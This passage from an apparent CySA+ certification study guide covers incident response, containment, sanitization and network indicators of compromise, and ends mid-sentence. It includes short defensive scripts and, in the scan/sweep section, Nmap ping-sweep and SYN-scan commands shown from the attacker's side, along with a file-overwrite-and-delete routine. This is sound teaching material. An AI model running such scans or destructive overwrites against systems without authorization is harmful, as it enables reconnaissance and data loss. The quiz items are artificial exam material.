generally accepted incident response plan is shown in
Figure 16-1 and described in the list that follows.
Figure 16-1 Incident Response Process
Step 1. Detect: The first step is to detect the
incident. The worst sort of incident is one
that goes unnoticed.
Step 2. Respond: The response to the incident
should be appropriate for the type of incident.
A denial of service (DoS) attack against a web
server would require a quicker and different
response than a missing mouse in the server
room. Establish standard responses and
response times ahead of time.
Step 3. Report: All incidents should be reported
within a time frame that reflects the
seriousness of the incident. In many cases,
establishing a list of incident types and the
person to contact when each type of incident
occurs is helpful. Attention to detail at this
early stage, while time-sensitive information
is still available, is critical.
Step 4. Recover: Recovery involves a reaction
designed to make the network or system
affected functional again. Exactly what that
means depends on the circumstances and the
recovery measures available. For example, if
fault-tolerance measures are in place, the
recovery might consist of simply allowing one
server in a cluster to fail over to another. In
other cases, it could mean restoring the
server from a recent backup. The main goal of
this step is to make all resources available
again.
Step 5. Remediate: This step involves eliminating
any residual danger or damage to the network
that still might exist. For example, in the case
of a virus outbreak, it could mean scanning
all systems to root out any additional affected
machines. These measures are designed to
make a more detailed mitigation when time
allows.
Step 6. Review: Finally, you need to review each
incident to discover what can be learned from
it. Changes to procedures might be called for.
Share lessons learned with all personnel who
might encounter the same type of incident
again. Complete documentation and analysis
are the goals of this step.
The actual investigation of an incident occurs during the
respond, report, and recover steps. Following
appropriate forensic and digital investigation processes
during an investigation can ensure that evidence is
preserved.
Your responses will benefit from using standard forms
that prompt for the collection of all relevant information
that can lead to a better and more consistent response
process over time. Some examples of commonly used
forms are as follows:
• Incident form: This form is used to describe the
incident in detail. It should include sections to
record complementary metal oxide semiconductor
(CMOS), hard drive information, image archive
details, analysis platform information, and other
details. The best approach is to obtain a template
and customize it to your needs.
• Call list/escalation list: First responders to an
incident should have contact information for all
individuals who might need to be alerted during
the investigation. This list should also indicate
under what circumstance these individuals should
be contacted to avoid unnecessary alerts and to
keep the process moving in an organized manner.
DETECTION AND ANALYSIS
Once evidence from an incident has been collected, it
must be analyzed and classified as to its severity so that
more critical incidents can be dealt with first and less
critical incidents later.
Characteristics Contributing to
Severity Level Classification
To properly prioritize incidents, each must be classified
with respect to the scope of the incident and the types of
data that have been put at risk. Scope is more than just
how widespread the incident is, and the types of data
classifications may be more varied than you expect. The
following sections discuss the factors that contribute to
incident severity and prioritization.
The scope determines the impact and is a function of
how widespread the incident is and the potential
economic and intangible impacts it could have on the
business. Five common factors are used to measure
scope. They are covered in the following sections.
Downtime and Recovery Time
One of the issues that must be considered is the potential
amount of downtime the incident could inflict and the
time it will take to recover from the incident. If a proper
business continuity plan (BCP) has been created, you will
have collected information about each asset that will help
classify incidents that affect each asset.
As part of determining how critical an asset is, you need
to understand the following terms:
• Maximum tolerable downtime (MTD): This
is the maximum amount of time that an
organization can tolerate a single resource or
function being down. This is also referred to as
maximum period of time of disruption (MPTD).
• Mean time to repair (MTTR): This is the
average time required to repair a single resource
or function when a disaster or disruption occurs.
• Mean time between failures (MTBF): This is
the estimated amount of time a device will operate
before a failure occurs. This amount is calculated
by the device vendor. System reliability is
increased by a higher MTBF and lower MTTR.
• Recovery time objective (RTO): This is the
shortest time period after a disaster or disruptive
event within which a resource or function must be
restored in order to avoid unacceptable
consequences. RTO assumes that an acceptable
period of downtime exists. RTO should be smaller
than MTD.
• Work recovery time (WRT): This is the difference between the MTD and the RTO, which is the time remaining after the RTO before the MTD is reached. For example, with an MTD of 24 hours and an RTO of 16 hours, the WRT is 8 hours.
• Recovery point objective (RPO): This is the
point in time to which the disrupted resource or
function must be returned.
Each organization must develop its own documented
criticality levels. The following is a good example of
organizational resource and function criticality levels:
• Critical: Critical resources are those resources
that are most vital to the organization’s operation
and should be restored within minutes or hours of
the disaster or disruptive event.
• Urgent: Urgent resources should be restored
within 24 hours but are not considered as
important as critical resources.
• Important: Important resources should be
restored within 72 hours but are not considered as
important as critical or urgent resources.
• Normal: Normal resources should be restored
within 7 days but are not considered as important
as critical, urgent, or important resources.
• Nonessential: Nonessential resources should be
restored within 30 days.
Data Integrity
Data integrity refers to the correctness, completeness,
and soundness of the data. One of the goals of integrity
services is to protect the integrity of data or at least to
provide a means of discovering when data has been
corrupted or has undergone an unauthorized change.
One of the challenges with data integrity attacks is that
the effects might not be detected for years—until there is
a reason to question the data. Identifying the
compromise of data integrity can be made easier by using file-hashing algorithms and tools to check seldom-used but sensitive files for unauthorized changes after an incident. These tools can be run to quickly identify files
that have been altered. They can help you get a better
assessment of the scope of the data corruption.
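As a minimal sketch of this approach, the following Python example recomputes SHA-256 digests for sensitive files and compares them against a previously recorded baseline. The file path and digest shown are hypothetical.

import hashlib

# Hypothetical baseline of known-good digests recorded before the incident
baseline = {
    "/srv/finance/ledger.db":
        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
}

def sha256_of(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

for path, expected in baseline.items():
    if sha256_of(path) != expected:
        print(f"Integrity check failed: {path} has been altered")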
Economic
The economic impact of an incident is driven mainly by
the value of the assets involved. Determining those
values can be difficult, especially for intangible assets
such as plans, designs, and recipes. Tangible assets
include computers, facilities, supplies, and personnel.
Intangible assets include intellectual property, data, and
organizational reputation. The value of an asset should
be considered with respect to the asset owner’s view. The
following considerations can be used to determine an
asset’s value:
• Value to owner
• Work required to develop or obtain the asset
• Costs to maintain the asset
• Damage that would result if the asset were lost
• Cost that competitors would pay for the asset
• Penalties that would result if the asset were lost
After determining the value of assets, you should
determine the vulnerabilities and threats to each asset.
System Process Criticality
Some assets are not actually information but systems
that provide access to information. When these systems
or groups of systems provide access to data required to
continue to do business, they are called critical systems.
While it is somewhat simpler to arrive at a value for
physical assets such as servers, routers, switches, and
other devices, in cases where these systems provide
access to critical data or are required to continue a
business-critical process, their value is more than the
replacement cost of the hardware. The assigned value
should be increased to reflect its importance in providing
access to data or its role in continuing a critical process.
Reverse Engineering
Reverse engineering can refer to retracing the steps
in an incident, as seen from the logs in the affected
devices or in logs of infrastructure devices that may have
been involved in transferring information to and from
the devices. This can help you understand the sequence
of events. When unknown malware is involved, the term
reverse engineering may refer to an analysis of the
malware’s actions to determine a removal technique.
This is the approach to zero-day attacks in which no
known fix is yet available from anti-malware vendors.
With respect to reverse engineering malware, this
process refers to extracting the code from the binary
executable to identify how it was programmed and what
it does. There are three ways the binary malware file can
be made readable:
• Disassembly: This refers to reading the machine
code into memory and then outputting each
instruction as a text string. Analyzing this output
requires a very high level of skill and special
software tools.
• Decompiling: This process attempts to
reconstruct the high-level language source code.
• Debugging: This process steps through the code
interactively. There are two kinds of debuggers:
• Kernel debugger: This type of debugger
operates at ring 0 (essentially the driver level)
and has direct access to the kernel.
• Usermode debugger: This type of debugger
has access to only the usermode space of the
operating system. Most of the time, this is
enough, but not always. In the case of rootkits
or even super-advanced protection schemes, it
is preferable to step into a kernel mode
debugger instead because usermode in such
situations is untrustworthy.
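To give a flavor of disassembly, the following Python sketch uses the open-source Capstone library to turn a few bytes of machine code into text instructions. The byte string is a tiny illustrative x86-64 fragment, not real malware.

from capstone import Cs, CS_ARCH_X86, CS_MODE_64   # pip install capstone

code = b"\x55\x48\x89\xe5\x5d\xc3"  # push rbp; mov rbp, rsp; pop rbp; ret
md = Cs(CS_ARCH_X86, CS_MODE_64)

for insn in md.disasm(code, 0x1000):  # 0x1000 is an arbitrary base address
    print(f"0x{insn.address:x}:\t{insn.mnemonic}\t{insn.op_str}")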
Data Correlation
Data correlation is the process of locating variables in
the information that seem to be related. For example, say
that every time there is a spike in SYN packets, you seem
to have a DoS attack. When you apply these processes to
the data in security logs of devices, it helps you identify
correlations that help you identify issues and attacks. A
good example of such a system is a security information
event management (SIEM) system. These systems collect
the logs, analyze the logs, and, through the use of
aggregation and correlation, help you identify attacks
and trends. SIEM systems are covered in more detail in
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
CONTAINMENT
Just as the first step when an injury occurs is to stop the
bleeding, after a security incident occurs, the first
priority is to contain the threat to minimize the damage.
There are a number of containment techniques. Not all
of them are available to you or advisable in all situations.
One of the benefits of proper containment is that it gives
you time to develop a good remediation strategy.
Segmentation
The segmentation process involves limiting the scope
of an incident by leveraging existing segments of the
network as barriers to prevent the spread to other
segments. These segments could be defined at either
Layer 3 or Layer 2 of the OSI reference model.
When you segment at Layer 3, you are creating barriers
based on IP subnets. These are either physical LANs or
VLANs. Creating barriers at this level involves deploying
access control lists (ACLs) on the routers to prevent
traffic from moving from one subnet to another. While it
is possible to simply shut down a router interface, in
some scenarios that is not advisable because the
interface is used to reach more subnets than the one
where the threat exists.
Segmenting at Layer 2 can be done in several ways:
• You can create VLANs, which create segmentation
at both Layer 2 and Layer 3.
• You can create private VLANs (PVLANs), which
segment an existing VLAN at Layer 2.
• You can use port security to isolate a device at
Layer 2 without removing it from the network.
In some cases, it might be advisable to use segmentation
at the perimeter of the network (for example, stopping
the outbound communication from an infected machine
or blocking inbound traffic).
Isolation
Isolation typically is implemented by either blocking all
traffic to and from a device or devices or by shutting
down device interfaces. This approach works well for a
single compromised system but becomes cumbersome
when multiple devices are involved. In that case,
segmentation may be a more advisable approach. If a
new device can be set up to perform the role of the
compromised device, the team may leave the device
running to analyze the end result of the threat on the
isolated host.
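As one illustration of host isolation, the following Python sketch drops all traffic to and from a compromised address on a Linux gateway using iptables. The address is hypothetical, the commands require root privileges, and on real networks switch-port or VLAN controls are often preferable.

import subprocess

COMPROMISED_IP = "192.0.2.50"  # hypothetical address of the affected host

# Drop traffic sourced from or destined to the compromised host
for chain, flag in (("INPUT", "-s"), ("OUTPUT", "-d"),
                    ("FORWARD", "-s"), ("FORWARD", "-d")):
    subprocess.run(["iptables", "-A", chain, flag, COMPROMISED_IP, "-j", "DROP"],
                   check=True)

print(f"All traffic to and from {COMPROMISED_IP} is now dropped")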
Another form of isolation, process isolation, is a technique whereby all processes (work being performed
by the processor) are executed using memory dedicated
to each process. This prevents processes from accessing
the memory of other processes, which can help to
mitigate attacks that do so.
ERADICATION AND
RECOVERY
After the threat has been contained, the next step is to
remove or eradicate the threat. In some cases the
compromised device can be cleaned without a format of
the hard drive, while in many other cases this must be
done to completely remove the threat. This section looks
at some removal approaches.
Vulnerability Mitigation
Once the specific vulnerability has been identified, it
must be mitigated. This mitigation will in large part be
driven by the type of issue with which you are presented.
In some cases the proper response will be to format the
hard drive of the affected system and reimage it. In other
cases the mitigation may be a change in policies, when a
weakness is revealed that results from the way the
organization operates. Let’s look at some common
mitigations.
Sanitization
Sanitization refers to removing all traces of a threat by
overwriting the drive multiple times to ensure that the
threat is removed. This works well for mechanical hard
disk drives, but solid-state drives present a challenge in
that they cannot be overwritten. Most solid-state drive
vendors provide sanitization commands that can be used
to erase the data on the drive. Security professionals
should research these commands to ensure that they are
effective.
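The following Python sketch shows the multi-pass overwrite idea applied to a single file. The target path is hypothetical, sanitizing an entire drive requires dedicated tools, and, as noted above, overwriting is not reliable for solid-state drives.

import os

def overwrite_file(path: str, passes: int = 3) -> None:
    """Overwrite a file's contents with random data several times, then delete it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))  # overwrite with random data
            f.flush()
            os.fsync(f.fileno())       # force the write to physical storage
    os.remove(path)

overwrite_file("/tmp/sensitive-export.csv")  # hypothetical target file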
Note
NIST Special Publication 800-88 Rev. 1 is an example of a government
guideline for proper media sanitization, as are the IRS guidelines for proper
media sanitization:
• https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf
• https://www.irs.gov/privacy-disclosure/media-sanitization-guidelines
Reconstruction/Reimaging
Once a device has been sanitized, the system must be
rebuilt. This can be done by reinstalling the operating
system, applying all system updates, reinstalling the
anti-malware software, and implementing any
organization security settings. Then, any needed
applications must be installed and configured. If the
device is a server that is running some service on behalf
of the network (for example, DNS or DHCP), that service
must be reconfigured as well. All this is not only a lot of
work, it is time-consuming. A better approach is to
maintain standard images of the various device types in
the network so that you can use these images to stand up
a device quickly. To make this approach even more seamless, maintaining a backup image of the same device eliminates the reconfiguration that would still be required when using a generic standard image.
Secure Disposal
In some instances, you may decide to dispose of a
compromised device (or its storage drive) rather than
attempt to sanitize and reuse the device. In that case, you
want to dispose of it in a secure manner. In the case of
secure disposal, an organization must consider certain
issues, including the following:
• Does removal or replacement introduce any
security holes in the network?
• How can the system be terminated in an orderly
fashion to avoid disrupting business continuity?
• How should any residual data left on any systems
be removed?
• Are there any legal or regulatory issues that would
guide the destruction of data?
Whenever data is erased or removed from a storage
media, residual data can be left behind. This can allow
data to be reconstructed when the organization disposes
of the media, and unauthorized individuals or groups
may be able to gain access to the data. When considering
data remanence, security professionals must understand
three countermeasures:
• Clearing: Clearing includes removing data from
the media so that it cannot be reconstructed using
normal file recovery techniques and tools. With
this method, the data is recoverable only using
special forensic techniques.
• Purging: Also referred to as sanitization, purging
makes the data unreadable even with advanced
forensic techniques. With this technique, data
should be unrecoverable.
• Destruction: Destruction involves destroying the media on which the data resides. Degaussing, one destruction technique, exposes the media to a powerful, alternating magnetic field, removing any previously written data and leaving the media in a magnetically randomized (blank) state. Physical destruction, another technique, involves physically breaking the media apart or chemically altering it.
Patching
In many cases, a threat or an attack is made possible by
missing security patches. You should update or at least
check for updates for a variety of components. This
includes all patches for the operating system, updates for
any applications that are running, and updates to all
anti-malware software that is installed. While you are at
it, check for any firmware update the device may require.
This is especially true of hardware security devices such
as firewalls, IDSs, and IPSs. If any routers or switches
are compromised, check for software and firmware
updates.
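As a quick sketch of how you might check patch status from the command line (package names and output will vary by platform):

sudo apt update
apt list --upgradable
wmic qfe list brief

The first two commands list pending package updates on a Debian-based Linux system; the last lists the hotfixes installed on a Windows host so they can be compared against the vendor's current baseline.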
Restoration of Permissions
Many times an attacker compromises a device by altering
the permissions, either in the local database or in entries
related to the device in the directory service server. All
permissions should undergo a review to ensure that all
are in the appropriate state. The appropriate state may
not be the state they were in before the event. Sometimes you may discover that although permissions were not set in a dangerous way prior to an event, they were still not correct. Make sure to check the configuration database to
ensure that settings match prescribed settings. You
should also make changes to the permissions based on
lessons learned during an event. In that case, ensure that
the new settings undergo a change control review and
that any approved changes are reflected in the
configuration database.
Reconstitution of Resources
In many incidents, resources may be deleted or stolen. In
other cases, the process of sanitizing the device causes
the loss of information resources. These resources should
be recovered from backup. One key process that can
minimize data loss is to shorten the time between
backups for critical resources. This results in a recovery
point objective (RPO) that includes more recent data.
RPO is discussed in more detail earlier in this chapter.
Restoration of Capabilities and
Services
During the incident response, it might be necessary to
disrupt some of the normal business processes to help
contain the issue or to assist in remediation. It is also
possible that the attack has rendered some services and
capabilities unavailable. Once an effective response has
been mounted, these systems and services must be
restored to full functionality. Just as shortening the backup interval can help to reduce the effects of data loss, fault-tolerant measures can be effective in preventing the loss of critical services.
Verification of
Logging/Communication to Security
Monitoring
To ensure that you will have good security data going
forward, you need to ensure that all logs related to
security are collecting data. Pay special attention to the
manner in which the logs react when full. With some
settings, the log begins to overwrite older entries with
new entries. With other settings, the service stops
collecting events when the log is full. Security log entries
need to be preserved. This may require manual archiving
of the logs and subsequent clearing of the logs. Some logging systems can do this automatically, whereas others require a script. If all else fails, check the log often to assess its
state.
Many organizations send all security logs to a central
location. This could be a Syslog server, or it could be a
SIEM system. These systems not only collect all the logs,
they use the information to make inferences about
possible attacks. Having access to all logs allows the
system to correlate all the data from all responding
devices.
Regardless of whether you are logging to a Syslog server
or a SIEM system, you should verify that all
communications between the devices and the central
server are occurring without a hitch. This is especially
true if you had to rebuild the system manually rather
than restore from an image, as there would be more
opportunity for human error in the rebuilding of the
device.
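One simple way to verify the pipeline on a Linux host is to generate a test event and then confirm that log traffic is actually leaving for the collector (the facility, message text, and collector address 10.0.0.50 are illustrative):

logger -p auth.notice "post-incident logging verification test"
tcpdump -i eth0 host 10.0.0.50 and port 514

If the test entry appears locally but no corresponding traffic reaches the collector, the forwarding configuration should be revisited.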
POST-INCIDENT ACTIVITIES
Once the incident has been contained and removed and
the recovery process is complete, there is still work to be
done. Much of it, as you might expect, is paperwork, but
this paperwork is critical to enhancing the response to
the next incident. Let’s look at some of these post-incident activities that should take place.
Evidence Retention
If the incident involved a security breach and the
incident response process gathered evidence to prove an
illegal act or a violation of policy, the evidence must be
stored securely until it is presented in court or is used to
confront the violating employee. Computer
investigations require different procedures than regular
investigations because the time frame for the computer
investigator is compressed, and an expert might be
required to assist in the investigation. Also, computer
information is intangible and often requires extra care to
ensure that the data is retained in its original format.
Finally, the evidence in a computer crime is difficult to
gather.
After a decision has been made to investigate a computer
crime, you should follow standardized procedures,
including the following:
• Identify what type of system is to be seized.
• Identify the search and seizure team members.
• Determine the risk of the suspect destroying
evidence.
After law enforcement has been informed of a computer
crime, the constraints on the organization’s investigator
are increased. Turning over an investigation to law
enforcement to ensure that evidence is preserved
properly might be necessary.
When investigating a computer crime, evidentiary rules
must be addressed. Computer evidence should prove a
fact that is material to the case and must be reliable. The
chain of custody must be maintained. Computer
evidence is less likely to be admitted in court as evidence
if the process for producing it is not documented.
Lessons Learned Report
The first document that should be drafted is a lessons
learned report, which briefly lists and discusses what
was learned about how and why the incident occurred
and how to prevent it from occurring again. This report
should be compiled during a formal meeting shortly after
recovery from the incident. This report provides valuable
information that can be used to drive improvement in
the security posture of the organization. This report
might answer questions such as the following:
• What went right, and what went wrong?
• How can we improve?
• What needs to be changed?
• What was the cost of the incident?
Change Control Process
The lessons learned report may generate a number of
changes that should be made to the network
infrastructure. All these changes, regardless of how
necessary they are, should go through the standard
change control process. They should be submitted to the
change control board, examined for unforeseen
consequences, and studied for proper integration into
the current environment. Only after gaining approval
should they be implemented. You may find it helpful to
create a “fast track” for assessment in your change
management system for changes such as these when
time is of the essence. For more details regarding change
control processes, refer to Chapter 8, “Security Solutions
for Infrastructure Management.”
Incident Response Plan Update
The lessons learned exercise may also uncover flaws in
your IR plan. If this is the case, you should update the
plan appropriately to reflect the needed procedure
changes. When this is complete, ensure that all soft copy and hard copy versions of the plan have been updated so everyone is working from the same document when the
next event occurs.
Incident Summary Report
All stakeholders should receive a document that
summarizes the incident. It should not have an excessive
amount of highly technical language in it, and it should
be written so nontechnical readers can understand the
major points of the incident. The following are some of
the highlights that should be included in an incident
summary report:
• When the problem was first detected and by whom
• The scope of the incident
• How it was contained and eradicated
• Work performed during recovery
• Areas where the response was effective
• Areas that need improvement
Indicator of Compromise (IoC)
Generation
Indicators of compromise (IoCs) are behaviors and
activities that precede or accompany a security incident.
In Chapter 17, “Analyzing Potential Indicators of
Compromise,” you will learn what some of these
indicators are and what they may tell you. You should
always record or generate the IoCs that you find related
to the incident. This information may be used to detect
the same sort of incident later, before it advances to the
point of a breach.
Monitoring
As previously discussed, it is important to ensure that all
security surveillance tools (IDS, IPS, SIEM, firewalls) are
back online and recording activities and reporting as
they should be, as discussed in Chapter 11. Moreover,
even after you have taken all steps described thus far,
consider using a vulnerability scanner to scan the devices
or the network of devices that were affected. Make sure
before you do so that you have updated the scanner so it
can recognize the latest vulnerabilities and threats. This
will help catch any lingering vulnerabilities that may still
be present.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 16-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 16-2 Key Topics for Chapter 16
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
incident form
call list/escalation list
scope
maximum tolerable downtime (MTD)
mean time to repair (MTTR)
mean time between failures (MTBF)
recovery time objective (RTO)
work recovery time (WRT)
recovery point objective (RPO)
reverse engineering
disassembly
decompiling
debugging
kernel debugger
usermode debugger
data correlation
segmentation
isolation
sanitization
clearing
purging
destruction
lessons learned report
incident summary report
indicator of compromise (IoC)
REVIEW QUESTIONS
1. When security incidents occur, the quality of the
response is directly related to the amount of and
quality of the ____________.
2. List the steps, in order, of the incident response
process.
3. Match the following terms with their definitions.
4. ____________________ involves eliminating
any residual danger or damage to the network that
still might exist.
5. List at least two considerations that can be used to
determine an asset’s value.
6. Match the following terms with their definitions.
7. The _______________________ should
indicate under what circumstance individuals
should be contacted to avoid unnecessary alerts
and to keep the process moving in an organized
manner.
8. List at least one way the binary malware file can be
made readable.
9. Match the following terms with their definitions.
10. ______________________ are behaviors and
activities that precede or accompany a security
incident.
Chapter 17. Analyzing
Potential Indicators of
Compromise
This chapter covers the following topics related
to Objective 4.3 (Given an incident, analyze
potential indicators of compromise) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification exam:
• Network-related indicators of compromise:
Includes bandwidth consumption, beaconing,
irregular peer-to-peer communication, rogue
device on the network, scan/sweep, unusual
traffic spike, and common protocol over non-standard port
• Host-related indicators of compromise:
Covers processor consumption, memory
consumption, drive capacity consumption,
unauthorized software, malicious process,
unauthorized change, unauthorized privilege, data
exfiltration, abnormal OS process behavior, file
system change or anomaly, registry change or
anomaly, and unauthorized scheduled task
• Application-related indicators of
compromise: Includes anomalous activity,
introduction of new accounts, unexpected output,
unexpected outbound communication, service
interruption, and application log
Indicators of compromise (IoCs) are somewhat like clues left at the scene of a crime, except they also include clues that preceded the crime. IoCs help us to anticipate security issues and also to reconstruct the process that led to the security issue or breach. This chapter examines some common IoCs and what they might indicate.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 17-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 17-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following IoCs is most likely from a
DoS attack?
a. Beaconing
b. Irregular peer-to-peer communication
c. Bandwidth consumption
d. Rogue device on the network
2. Which of the following IoCs is most likely an
indication of a botnet?
a. Beaconing
b. Irregular peer-to-peer communication
c. Bandwidth consumption
d. Rogue device on the network
3. Which of the following is used to locate live
devices?
a. Ping sweep
b. Port scan
c. Pen test
d. Vulnerability test
4. Which of the following metrics cannot be found in
Windows Task Manager?
a. Memory consumption
b. Drive capacity consumption
c. Processor consumption
d. Unauthorized software
5. Which of the following utilities is a freeware task
manager that offers more functionality than
Windows Task Manager?
a. System Information
b. Process Explorer
c. Control Panel
d. Performance
6. Which of the following is a utility built into the
Windows 10 operating system that checks for
system file corruption?
a. TripWire
b. System File Checker
c. sigver
d. SIEM
7. Which of the following might be an indication of a
backdoor?
a. Introduction of new accounts
b. Unexpected output
c. Unexpected outbound communication
d. Anomalous activity
8. Within which of the following tools is the
Application log found?
a. Event Viewer
b. Performance
c. System Information
d. App Locker
9. Which of the following is not an application-related
IoC?
a. Introduction of new accounts
b. Unexpected output
c. Unexpected outbound communication
d. Beaconing
FOUNDATION TOPICS
NETWORK-RELATED
INDICATORS OF
COMPROMISE
Security analysts, regardless of whether they are
operating in the role of first responder or in a supporting
role analyzing issues, should be aware of common
indicators of compromise. Moreover, they should be aware of the types of incidents implied by each IoC. This can lead to a quicker and more accurate choice of action when time is of the essence. It is helpful to examine these IoCs in relation to the component that is displaying the IoC.
Certain types of network activity are potential indicators
of security issues. The following sections describe the
most common of the many network-related symptoms.
Bandwidth Consumption
Whenever bandwidth usage is above normal and there is
no known legitimate activity generating the traffic, you
should suspect security issues that generate unusual
amounts of traffic, such as denial-of-service (DoS) or
distributed denial-of-service (DDoS) attacks. For this
reason, benchmarks should be created for normal
bandwidth usage at various times during the day. Then
alerts can be set when activity rises by a specified
percentage at those various times. Many free network
bandwidth monitoring tools are available. Among them
are BitMeter OS, FreeMeter Bandwidth Monitor,
BandwidthD, and PRTG Network Monitor. Anomaly-based intrusion detection systems can also “learn”
normal traffic patterns and can set off alerts when
unusual traffic is detected. Figure 17-1 shows an example
of setting an alert in BitMeter.
Figure 17-1 Setting an Alert in BitMeter
Beaconing
Beaconing refers to traffic that leaves a network at
regular intervals. This type of traffic could be generated
by compromised hosts that are attempting to
communicate with (or call home) the malicious party
that compromised the host. While there are security
products that can identify beacons, including firewalls,
intrusion detection systems, web proxies, and SIEM
systems, creating and maintaining baselines of activity
will help you identify beacons that are occurring during
times of no activity (for example, at night). When this
type of traffic is detected, you should search the local
source device for scripts that may be generating these
calls home.
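As a rough sketch of how you might hunt for beacons in a capture (the file name and source address are hypothetical), tshark can extract per-destination timestamps so you can look for fixed intervals:

tshark -r capture.pcap -Y "ip.src == 10.0.0.5" -T fields -e frame.time_epoch -e ip.dst

Regularly spaced timestamps to the same external address, especially during off-hours, are worth investigating.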
Irregular Peer-to-Peer
Communication
Some traffic between peers within a network is normal, but irregular peer-to-peer communications may be an indication of a security issue. At the very least, illegal file sharing could be occurring, and at the worst, this peer-to-peer (P2P) communication could be the result of a botnet. Peer-to-peer botnets differ from normal botnets
in their structure and operation. Figure 17-2 shows the
structure of a traditional botnet. In this scenario, all
the zombies communicate directly with the command
and control server, which is located outside the network.
The limitation of this arrangement and the issue that
gives rise to peer-to-peer botnets is that devices that are
behind a NAT server or proxy server cannot participate.
Only devices that can be reached externally can do so.
Figure 17-2 Traditional Botnet
In a peer-to-peer botnet, devices that can be reached
externally are compromised and run server software that
turns them into command and control servers for the
devices that are recruited internally that cannot
communicate with the command and control server
operating externally. Figure 17-3 shows this
arrangement.
Figure 17-3 Peer-to-Peer Botnet
Regardless of whether peer-to-peer traffic is used as part
of a botnet or simply as a method of file sharing, it
presents the following security issues:
• The spread of malicious code that may be shared
along with the file
• Inadvertent exposure of sensitive material located
in unsecured directories
• Actions taken by the P2P application that make a
device more prone to attack, such as opening
ports
• Network DoS attacks created by large downloads
• Potential liability from pirated intellectual
property
Because of the dangers, many organizations choose to
prohibit the use of P2P applications and block common
port numbers used by these applications at the firewall.
Another helpful remediation is to keep all anti-malware
software up to date in case malware is transmitted by the
use of P2P applications.
Rogue Device on the Network
Any time new devices appear on a network, there should
be cause for suspicion. While it is possible that users may
be introducing these devices innocently, there are also a
number of bad reasons for these devices to be on the
network. The following types of illegitimate devices may
be found on a network:
• Wireless key loggers: These collect
information and transmit it to the criminal via
Bluetooth or Wi-Fi.
• Wi-Fi and Bluetooth hacking gear: This gear
is designed to capture both Bluetooth and Wi-Fi
transmissions.
• Rogue access points: Rogue APs are designed to lure your hosts into a connection for a peer-to-peer attack.
• Rogue switches: These switches can attempt to
create a trunk link with a legitimate switch, thus
providing access to all VLANs.
• Mobile hacking gear: This gear allows a
malicious individual to use software along with
software-defined radios to trick cell phone users
into routing connections through a fake cell tower.
The actions required to detect or prevent rogue
devices depend on the type of device. With respect to
rogue switches, ensure that all ports that are required to
be trunks are “hard coded” as trunks and that Dynamic
Trunking Protocol (DTP) is disabled on all switch ports.
With respect to rogue wireless access points, the best
solution is a wireless intrusion prevention system
(WIPS). These systems can not only alert you when any
unknown device is in the area (APs and stations) but can
take a number of actions to prevent security issues,
including the following:
• Locate a rogue AP by using triangulation when
three or more sensors are present
• Deauthenticate any stations that have connected
to an “evil twin”
• Detect denial-of-service attacks
• Detect man-in-the-middle and client-impersonation attacks
Some examples of these tools include Mojo Networks
AirTight WIPS, HP RFProtect, Cisco Adaptive Wireless
IPS, Fluke Networks AirMagnet Enterprise, HP Mobility
Security IDS/IPS, and Zebra Technologies AirDefense.
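For the rogue switch mitigation mentioned earlier, the relevant Cisco IOS interface commands look something like the following sketch (interface numbering is hypothetical):

interface range GigabitEthernet0/2 - 24
 switchport mode access
 switchport nonegotiate

Hard-coding each user-facing port as an access port and disabling DTP negotiation prevents a rogue switch from forming a trunk on that port.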
Scan/Sweep
One of the early steps in a penetration test is to scan or
sweep the network. If no known penetration test is under
way but a scan or sweep is occurring, it is an indication
that a malicious individual may be scanning in
preparation for an attack. The following are the most
common of these scans:
• Ping sweeps: Also known as ICMP sweeps, ping
sweeps use ICMP to identify all live hosts by
pinging all IP addresses in the known network. All
devices that answer are up and running.
• Port scans: Once all live hosts are identified, a
port scan attempts to connect to every port on
each device and report which ports are open, or
“listening.”
• Vulnerability scans: Vulnerability scans are
more comprehensive than the other types of scans
in that they identify open ports and security
weaknesses. The good news is that uncredentialed
scans expose less information than credentialed
scans. An uncredentialed scan is a scan in
which the scanner lacks administrative privileges
on the device it is scanning.
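It helps to know what these scans look like from the attacker's side. For example, Nmap can perform them as follows (target addresses are hypothetical):

nmap -sn 10.1.0.0/24
nmap -sS -p- 10.1.0.20

The first command is a ping sweep that discovers live hosts without port scanning them; the second is a SYN scan of all 65,535 TCP ports on a single host. Traffic matching these patterns from an unexpected source is a red flag.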
Unusual Traffic Spike
Any unusual spikes in traffic that are not expected
should be cause for alarm. Just as an increase in
bandwidth usage may indicate DoS or DDoS activity,
unusual spikes in traffic may also indicate this type of
activity. Again, know what your traffic patterns are and
create a baseline of this traffic rhythm. With traffic
spikes, there are usually accompanying symptoms such
as network slowness and, potentially, alarms from any
IPSs or IDSs you have deployed.
Keep in mind that there are other legitimate reasons for
traffic spikes. The following are some of the normal
activities that can cause these spikes:
• Backup traffic in the LAN
• Virus scanner updates
• Operating system updates
• Mail server issues
Common Protocol over Non-standard Port
Common protocols such as FTP, SMTP, and SNMP use
default port numbers that have been standardized.
However, it is possible to run these protocols over
different port numbers. Whenever you discover this
being done, you should treat the transmission with
